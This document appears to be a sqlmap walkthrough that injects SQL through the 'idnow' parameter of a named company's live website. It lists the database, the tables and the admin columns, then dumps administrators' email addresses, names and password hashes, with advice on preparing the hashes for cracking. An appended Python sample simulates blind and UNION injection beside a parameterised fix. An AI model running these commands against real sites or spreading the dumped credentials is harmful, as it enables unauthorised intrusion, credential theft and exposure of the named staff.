sqlmap
url: http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4

Step 1: -u <injection URL> --dbms "Mysql" --current-user
Get the name of the database user the application connects as. Passing --dbms skips DBMS fingerprinting once you already know the back end is MySQL.

[root@Hacker~]# sqlmap -u "http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4" --dbms "Mysql" --current-user

sqlmap stops at a few y/n prompts during detection; answer y (or add --batch to accept the defaults non-interactively) and the result follows:

sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Place: GET
Parameter: idnow
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idnow=4 AND 8576=8576

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: idnow=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a71696d3a,0x586d766645564446784b,0x3a68706b3a), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: idnow=4 AND SLEEP(5)
---
web application technology: Apache 2.2.16, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
current user: 'zjmall@localhost'

Result of step 1: the database user is zjmall. The @localhost part means the account is only allowed to connect locally, so the web application and MySQL run on the same host. All three techniques work on idnow, which is why every later step needs only a handful of requests: sqlmap will prefer the UNION technique (one request per row) and fall back to the blind ones only if it has to.

Step 2: -u <injection URL> --dbms "Mysql" --current-db
Get the name of the database the application is using.

[root@Hacker~]# sqlmap -u "http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4" --dbms "Mysql" --current-db

Result of step 2:

current database: 'xbase'

xbase is the database name.

Step 3: -u <injection URL> --dbms "Mysql" --tables -D "xbase"
Here "xbase" is the database name. List all tables in that database.

[root@Hacker~]# sqlmap -u "http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4" --dbms "Mysql" --tables -D "xbase"

Result of step 3:

+---------------------------------------------+
| address_book                                |
| address_format                              |
| admin                                       |
| admin_files                                 |
| admin_groups                                |
| awards                                      |
| banners                                     |
| banners_history                             |
| block_p                                     |
| card                                        |
| categories                                  |
| categories_description                      |
| cdb_announcements                           |
| cdb_attachments                             |
| cdb_banned                                  |
| cdb_buddys                                  |
| cdb_favorites                               |
| cdb_forumlinks                              |
| cdb_forums                                  |
| cdb_karmalog                                |
| cdb_members                                 |
| cdb_pm                                      |
| cdb_poll                                    |
| cdb_posts                                   |
| cdb_searchindex                             |
| cdb_sessions                                |
| cdb_settings                                |
| cdb_smilies                                 |
| cdb_stats                                   |
| cdb_styles                                  |
| cdb_stylevars                               |
| cdb_subscriptions                           |
| cdb_templates                               |
| cdb_threads                                 |
| cdb_usergroups                              |
| cdb_words                                   |
| channel_user                                |
| christmas                                   |
| cms_ad                                      |
| configuration                               |
| configuration_group                         |
| copyright                                   |
| counter                                     |
| counter_area                                |
| counter_browser                             |
| counter_daily                               |
| counter_day                                 |
| counter_detail                              |
| counter_history                             |
| counter_month                               |
| counter_year                                |
| countries                                   |
| currencies                                  |
| customers                                   |
| customers_basket                            |
| customers_basket_attributes                 |
| customers_info                              |
| data                                        |
| detail                                      |
| detail3                                     |
| detail_str                                  |
| doa_info                                    |
| doa_info_old                                |
| doa_products                                |
| doa_user                                    |
| download                                    |
| downloadccccc                               |
| driver_download                             |
| driver_faq                                  |
| driver_faq_sort                             |
| driver_os                                   |
| driver_os_old                               |
| driver_products                             |
| enter                                       |
| faq                                         |
| faq1                                        |
| fenleibiao                                  |
| fujialm                                     |
| geo_zones                                   |
| hp_gb                                       |
| hp_newscontent                              |
| hp_newstitle                                |
| imgupload                                   |
| integral                                    |
| languages                                   |
| log_time                                    |
| magazine                                    |
| mail                                        |
| manufacturers                               |
| manufacturers_info                          |
| mpcaward                                    |
| newsletters                                 |
| orders                                      |
| orders_products                             |
| orders_products_attributes                  |
| orders_products_download                    |
| orders_status                               |
| orders_status_history                       |
| orders_total                                |
| other_download                              |
| other_download_old                          |
| pagecontent                                 |
| pdbmb                                       |
| phpbb_themes_name                           |
| probase                                     |
| products                                    |
| products_attributes                         |
| products_attributes_download                |
| products_description                        |
| products_firstpage_show                     |
| products_notifications                      |
| products_options                            |
| products_options_values                     |
| products_options_values_to_products_options |
| products_to_categories                      |
| projector                                   |
| question2                                   |
| question_classify                           |
| question_ok                                 |
| question_user                               |
| question_wait                               |
| reviews                                     |
| reviews_description                         |
| rma_info                                    |
| salable                                     |
| sanbaoka                                    |
| sessions                                    |
| software_xz                                 |
| specials                                    |
| study                                       |
| study09                                     |
| study2014                                   |
| study_sort                                  |
| sypdb                                       |
| sytpb                                       |
| tax_rates                                   |
| tb_admin                                    |
| tb_adurl                                    |
| tb_code                                     |
| tb_productbase                              |
| tb_productcapability                        |
| tb_search                                   |
| tb_search_sort                              |
| tb_type                                     |
| tb_type201503                               |
| tb_user                                     |
| tcpdlb3                                     |
| tcptpb                                      |
| tfzcpb                                      |
| tggxnb                                      |
| tggxxb                                      |
| thc                                         |
| tips                                        |
| title_pic                                   |
| tjgxxb                                      |
| tjxcb                                       |
| total                                       |
| total201505                                 |
| town                                        |
| tv_show                                     |
| txcxxb                                      |
| txmtpb                                      |
| txpfj                                       |
| tygb                                        |
| user2                                       |
| user_base                                   |
| userinfo                                    |
| wenjuan                                     |
| whos_online                                 |
| window                                      |
| wxzd_products                               |
| wxzd_station                                |
| wxzd_station2014                            |
| wxzk_sation2014_7                           |
| zones                                       |
| zones_to_geo_zones                          |
+---------------------------------------------+

Sensitive table name: admin (tb_admin, tb_user, user_base, userinfo, customers and cdb_members in the same list are worth a look for the same reason).

Step 4: -u <injection URL> --dbms "Mysql" --columns -T "admin" -D "xbase"
Here "admin" is the table name. List all columns of that table.

[root@Hacker~]# sqlmap -u "http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4" --dbms "Mysql" --columns -T "admin" -D "xbase"

Result of step 4:

Database: xbase
Table: admin
[10 columns]
+---------------------+-------------+
| Column              | Type        |
+---------------------+-------------+
| admin_created       | datetime    |
| admin_email_address | varchar(96) |
| admin_firstname     | varchar(32) |
| admin_groups_id     | int(11)     |
| admin_id            | int(11)     |
| admin_lastname      | varchar(32) |
| admin_logdate       | datetime    |
| admin_lognum        | int(11)     |
| admin_modified      | datetime    |
| admin_password      | varchar(40) |
+---------------------+-------------+

Sensitive columns: admin_password, admin_email_address, admin_firstname (admin_lastname is dumped as well below, to have every candidate login name side by side).

Step 5: -u <injection URL> --dbms "Mysql" --dump -C "admin_email_address,admin_firstname,admin_lastname,admin_password" -T "admin" -D "xbase" -v 0
The -C argument is the comma-separated list of column names to dump; -v 0 limits sqlmap's own output to critical messages. Dump the contents of those columns.

[root@Hacker~]# sqlmap -u "http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4" --dbms "Mysql" --dump -C "admin_email_address,admin_firstname,admin_lastname,admin_password" -T "admin" -D "xbase" -v 0

Result of step 5:

+-------------------------------------+----------------+-----------------+-------------------------------+
| admin_password                      | admin_lastname | admin_firstname | admin_email_address           |
+-------------------------------------+----------------+-----------------+-------------------------------+
| abb54e54d8506963266a299868b416f0:1a | Lee            | Roy             | root@zj.microtek.com.cn       |
| 4b53fdaeaa03382e1c6e190416807892:4d | Administrator  | Store           | xiaoping.chen@microtek.com.cn |
| 73b1911cf444c08c46a549a6a10a690c    | sdf            | a               | roy@microtek.com.cn           |
+-------------------------------------+----------------+-----------------+-------------------------------+

Two of the three admin_password values carry a two-character suffix after a colon; only the 32 hex characters before the colon are hash-sized, so check how the application computes and stores its password hashes before feeding these rows to a cracker.

admin_lastname looks like it is the account name, or else admin_email_address is the account (I did not test this either).
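Added example, not code from this post or from sqlmap: a SQLite stand-in for happystudy_info.php that reproduces two of the three techniques sqlmap reported for the idnow parameter (the boolean-based blind check behind "idnow=4 AND 8576=8576", carried through to full byte-by-byte extraction of admin_password, and the UNION marker probe behind the CONCAT(0x3a71696d3a, ..., 0x3a68706b3a) payload), next to the parameterised fix that stops both. MySQL-only syntax from the real payloads is replaced by SQLite equivalents (ORD(MID()) becomes unicode(substr()), CONCAT(0x..) becomes '..' || '..', and the stand-in query has two columns rather than the site's eight); SLEEP() has no SQLite counterpart, so the time-based technique is not shown. The happystudy and admin rows, the sample hash, and the function names are all assumptions constructed for the example.

```python
"""Simulates sqlmap's boolean-based blind and UNION techniques against a
SQLite stand-in for happystudy_info.php?idnow=... (constructed example)."""
import re
import secrets
import sqlite3

SAMPLE_ADMIN_PASSWORD = "5f4dcc3b5aa765d61d8327deb882cf99"  # constructed sample hash


def make_db():
    # Constructed sample rows; column names follow the page's xbase.admin table.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE happystudy(idnow INTEGER, title TEXT, body TEXT);
        INSERT INTO happystudy VALUES (4, 'Happy study #4', 'some text');
        CREATE TABLE admin(admin_id INTEGER, admin_firstname TEXT, admin_password TEXT);
        INSERT INTO admin VALUES (1, 'Roy', '%s');
    """ % SAMPLE_ADMIN_PASSWORD)
    return con


def vulnerable_page(con, idnow):
    """Stand-in for the vulnerable script: the raw idnow value is pasted into SQL."""
    sql = "SELECT title, body FROM happystudy WHERE idnow=" + idnow
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return "<h1>error</h1>"
    return "".join("<h1>%s</h1><p>%s</p>" % row for row in rows)


def fixed_page(con, idnow):
    """Hardened version: whitelist the shape of idnow, then bind it as a parameter."""
    if not re.fullmatch(r"\d{1,10}", idnow):
        return "<h1>bad request</h1>"
    rows = con.execute("SELECT title, body FROM happystudy WHERE idnow=?",
                       (int(idnow),)).fetchall()
    return "".join("<h1>%s</h1><p>%s</p>" % row for row in rows)


def decode_hex_literal(lit):
    """Decode a MySQL 0x.. string literal such as the ones in sqlmap's UNION payload."""
    return bytes.fromhex(lit[2:]).decode("ascii")


def boolean_oracle(page_fn, con, condition):
    """True iff record 4 still renders, i.e. the injected 'AND (condition)' held.
    sqlmap's 'idnow=4 AND 8576=8576' is exactly this check with a true condition."""
    return "Happy study #4" in page_fn(con, "4 AND (%s)" % condition)


def blind_extract(page_fn, con, subquery, max_len=64):
    """Boolean-based blind extraction: one byte per position, found by binary
    search on its code point (sqlmap does the same with ORD(MID(...)) on MySQL)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            cond = "unicode(substr((%s),%d,1)) >= %d" % (subquery, pos, mid)
            if boolean_oracle(page_fn, con, cond):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:
            break  # substr() past the end gives '' -> unicode() is NULL -> no byte here
        out += chr(lo)
    return out


def union_probe(page_fn, con):
    """UNION technique: select a random marker wrapped in fixed delimiters and
    look for it in the page; sqlmap's CONCAT(0x3a71696d3a, <random>, 0x3a68706b3a)
    is the same trick. Two columns here because the stand-in query has two."""
    marker = secrets.token_hex(5)  # 10 characters, like sqlmap's random token
    delim_l = decode_hex_literal("0x3a71696d3a")
    delim_r = decode_hex_literal("0x3a68706b3a")
    payload = "4 UNION ALL SELECT '%s' || '%s' || '%s', NULL" % (delim_l, marker, delim_r)
    pattern = re.escape(delim_l) + r"([0-9a-f]{10})" + re.escape(delim_r)
    m = re.search(pattern, page_fn(con, payload))
    return m is not None and m.group(1) == marker


def demo():
    """Run the same attacks against the vulnerable and the fixed handler."""
    con = make_db()
    target = "SELECT admin_password FROM admin LIMIT 1"
    return {
        "vulnerable": blind_extract(vulnerable_page, con, target),
        "fixed": blind_extract(fixed_page, con, target),
        "union_vulnerable": union_probe(vulnerable_page, con),
        "union_fixed": union_probe(fixed_page, con),
    }


if __name__ == "__main__":
    print(demo())
```

The blind path needs about seven requests per recovered byte, which is why sqlmap reaches for the UNION technique first when the page reflects query output; the fixed handler defeats both because the bound parameter never reaches the SQL parser as text.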
